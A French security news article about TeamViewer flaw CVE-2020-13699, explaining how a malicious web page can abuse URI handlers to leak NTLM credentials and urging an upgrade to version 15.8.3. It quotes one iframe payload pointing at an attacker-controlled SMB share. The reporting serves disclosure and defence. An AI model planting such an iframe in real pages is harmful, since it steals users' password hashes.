Posté le août 11, 2020 à 22:15
LA VULNÉRABILITÉ DE TEAMVIEWER POURRAIT PERMETTRE AUX HACKERS DE VOLER DES MOTS DE PASSE
Les chercheurs en sécurité ont averti qu’il existe actuellement une vulnérabilité dans TeamViewer qui pourrait permettre aux hackers de voler à distance les mots de passe du système. Il a été conseillé aux utilisateurs d’exécuter la dernière version du logiciel de bureau à distance pour Windows afin de prévenir toute attaque de vulnérabilité sur leurs systèmes.
L’équipe de TeamViewer a récemment publié une mise à jour de son logiciel pour aider ses utilisateurs à obtenir la dernière version du logiciel afin de se protéger davantage. La mise à jour comprend un correctif pour une grave vulnérabilité (CVE 2020-13699), qui pourrait permettre aux attaquants de voler les mots de passe des systèmes et de nuire aux systèmes s’ils sont exploités par des hackers.
Cependant, le plus inquiétant est le fait que toute personne qui a l’intention d’exploiter la vulnérabilité peut exécuter l’attaque presque automatiquement sans avoir besoin d’interagir avec les victimes. Il leur suffit de les convaincre de visiter une page web malveillante pour mettre en place l’attaque.
Pour ceux qui ne le savent pas, TeamViewer est un logiciel d’assistance à distance très connu qui permet aux utilisateurs de partager leur bureau à distance et de prendre le contrôle complet du PC de l’autre personne, où qu’elle se trouve dans le monde.
Le logiciel est disponible pour les systèmes d’exploitation mobiles et de bureau, notamment Blackberry, Windows Phone 8, Android, iOS, Chrome OS, Linux, macOS, ainsi que Windows.
La vulnérabilité permet le transfert de la demande d’authentification NTLM
La vulnérabilité a été découverte par Jeffrey Hofmann de Praetorian. Comme il l’a indiqué, la vulnérabilité à haut risque se trouve dans le processus par lequel la plateforme utilise ses gestionnaires d’URI personnalisés. Elle peut permettre aux attaquants de forcer le logiciel, relayant ainsi une demande d’authentification NTLM au système du hacker.
« Un attaquant pourrait intégrer une iframe malveillante dans un site web dont l’URL a été conçue (iframe src=’teamviewer10 : -play \\\\attacker-IP\share\fake.tvs’) », a expliqué M. Hoffman.
Il a en outre souligné que Windows procédera à une authentification NTLM lors de l’ouverture du partage SMB en relayant la requête avec un outil de réponse pour l’exécution du code.
La vulnérabilité de TeamViewer concerne les versions 8 à 15 pour la plate-forme Windows.
De manière plus simple, l’attaquant peut profiter du schéma URI de TeamViewer par le biais d’une page web pour suivre l’application installée sur le système cible et établir une connexion avec le partage SMB distant appartenant aux attaquants.
En conséquence, il lance cette attaque d’authentification SMB, en divulguant le nom d’utilisateur du serveur ainsi que la version hachée du mot de passe aux attaquants. Cela leur permet d’utiliser les détails volés pour accéder aux ressources du réseau ou à l’ordinateur de la victime.
Pour exploiter la vulnérabilité avec succès, le hacker devra installer une iframe malveillante sur une page web et inciter les victimes à visiter la page. Une fois que la victime clique sur la page web malveillante, elle configure automatiquement le client de bureau Windows et ouvre un partage SMB à distance.
Lors de l’ouverture du partage SMB, le système d’exploitation Windows de la victime effectuera une authentification NTLM en utilisant un répondeur avec des demandes différées.
La vulnérabilité est connue sous le nom de « Unquoted URI handler », et elle affecte les gestionnaires d’URI teamviewer10, tvvpn1, Tvvideocall1, tvsqsupport1, tvsqcuctomer1 et Tvsendfile1. L’équipe de TeamViewer a corrigé la vulnérabilité en citant les paramètres publiés par les gestionnaires d’URI ciblés.
Il est conseillé aux utilisateurs de mettre à niveau leurs systèmes
Pour l’instant, les hackers n’ont pas commencé à exploiter la vulnérabilité dans la nature. Cependant, avec la popularité du logiciel TeamViewer, il ne faudra pas longtemps avant que certains hackers commencent à exploiter la vulnérabilité. Des millions d’utilisateurs utilisent actuellement l’application TeamViewer et le nombre massif d’utilisateurs est suffisant pour intéresser les hackers.
Il est conseillé aux utilisateurs de se procurer la dernière mise à jour du logiciel, à savoir la version 15.8.3, car les hackers pourraient bientôt s’intéresser à la vulnérabilité et décider de l’exploiter. Les experts en sécurité conseillent aux utilisateurs du logiciel d’obtenir une mise à jour de leur système ou de faire face à la probabilité d’une attaque de leur ordinateur Windows par des hackers. Ce n’est pas la première attaque de SMB-authenticat9ion de ces derniers temps. Une attaque similaire a été initialement révélée dans Signal Messenger, Zoom Video Conferencing et Google Chrome.
